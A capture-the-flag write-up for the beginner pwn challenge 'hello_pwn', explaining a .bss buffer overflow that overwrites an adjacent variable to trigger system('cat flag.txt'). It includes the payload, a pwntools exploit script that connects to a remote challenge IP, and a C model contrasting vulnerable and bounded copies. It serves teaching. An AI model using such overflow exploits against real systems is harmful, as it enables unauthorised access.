---
title: "Attack and Defense World hello_pwn"
date: 2021-09-01
publish: true
tags: ["CTF", "PWN", "bss", "NUAACTF"]
---
Challenge
Source: NUAACTF
Description: pwn!, segment fault! The rookie falls into deep thought.
Analysis
- segment fault
The hint points at something segment-related; the analysis below shows it is the .bss segment.
Solution
checksec
```
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
```
Reverse Engineering
main
```c
__int64 __fastcall main(int a1, char **a2, char **a3)
{
  alarm(0x3Cu);
  setbuf(stdout, 0LL);
  puts("~~ welcome to ctf ~~ ");
  puts("lets get helloworld for bof");
  read(0, &unk_601068, 16uLL);
  if ( dword_60106C == 'nuaa' )
    sub_400686();
  return 0LL;
}
```
Up to 16 bytes of user input are read into unk_601068. When dword_60106C equals 'nuaa', the function sub_400686 is executed.
sub_400686
```c
__int64 sub_400686()
{
  system("cat flag.txt");
  return 0LL;
}
```
Executing this function gives the flag.
Binary Analysis
bss Segment Overflow
```
.bss:0000000000601068 unk_601068   db ?    ; DATA XREF: main+3B↑o
.bss:0000000000601069              db ?
.bss:000000000060106A              db ?
.bss:000000000060106B              db ?
.bss:000000000060106C dword_60106C dd ?    ; DATA XREF: main+4A↑r
.bss:000000000060106C _bss ends
```
unk_601068 and dword_60106C are both in the bss segment. A payload can be crafted to perform a bss segment overflow attack.

Select the area of unk_601068, right-click, and copy its size.
Its size is 4 bytes, so the first 4 bytes of input fill it and the next 4 bytes land in dword_60106C, which sits immediately after it.
From the checksec output we know the binary is little-endian, and the decompiler compares dword_60106C against the 32-bit multi-character constant 'nuaa', so the bytes must be sent in reverse order: "aaun".
Payload: @@@@aaun
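To make the adjacency concrete, here is an added example (written for this writeup, not part of the challenge source or the original post) that models the same .bss layout in C: a check that mirrors the 16-byte read() into the 4-byte buffer, beside a bounded variant whose copy can never reach dword_60106C. The struct, constant and function names are assumptions of the model, and it assumes a little-endian host like the target.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed mirror of the challenge's .bss layout: a 4-byte input buffer
 * (unk_601068) immediately followed by the 4-byte gate value (dword_60106C).
 * A char[4] followed by a uint32_t gets no padding, so the two fields are
 * adjacent exactly as in the listing. */
struct bss_layout {
    unsigned char buf[4];
    uint32_t gate;
};

/* The decompiler's multi-character constant 'nuaa' as a 32-bit integer:
 * ('n' << 24) | ('u' << 16) | ('a' << 8) | 'a'. */
#define GATE_VALUE 0x6e756161u

/* Returns 1 if the 4 given bytes are the little-endian encoding of
 * GATE_VALUE, i.e. what the bytes after the buffer must contain. */
int gate_matches_bytes(const unsigned char *b4) {
    unsigned char le[4];
    for (int i = 0; i < 4; i++)
        le[i] = (unsigned char)(GATE_VALUE >> (8 * i));
    return memcmp(le, b4, 4) == 0;
}

/* Mirrors read(0, &unk_601068, 16): up to 16 bytes are copied into a 4-byte
 * object, so bytes 4..7 of the input overwrite the gate. Returns 1 when the
 * gate comparison would pass, 0 otherwise. */
int vulnerable_check(const unsigned char *input, size_t len) {
    struct bss_layout bss = {{0}, 0};
    size_t n = len < 16 ? len : 16;
    if (n > sizeof bss) n = sizeof bss;   /* keep this model itself in bounds */
    memcpy(&bss, input, n);               /* spills past buf into gate */
    return bss.gate == GATE_VALUE;
}

/* Hardened variant: the copy is bounded by the buffer's own size, so input
 * can never reach the gate and only the program itself could set it. */
int hardened_check(const unsigned char *input, size_t len) {
    struct bss_layout bss = {{0}, 0};
    size_t n = len < sizeof bss.buf ? len : sizeof bss.buf;
    memcpy(bss.buf, input, n);
    return bss.gate == GATE_VALUE;
}
```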
Exploit
```python
from pwn import *

def main():
    io = remote('111.200.241.244', 64589)
    # 4 bytes fill unk_601068; 'nuaa' in little-endian byte order then lands in dword_60106C
    payload = '@' * 4 + 'aaun'
    io.sendline(payload.encode())
    print(io.recvall().decode())

if __name__ == '__main__':
    main()
```
Summary
- Understand the program flow through simple reverse engineering.
- Discover that obtaining the flag requires satisfying a specific condition.
- Achieve the condition via bss segment overflow.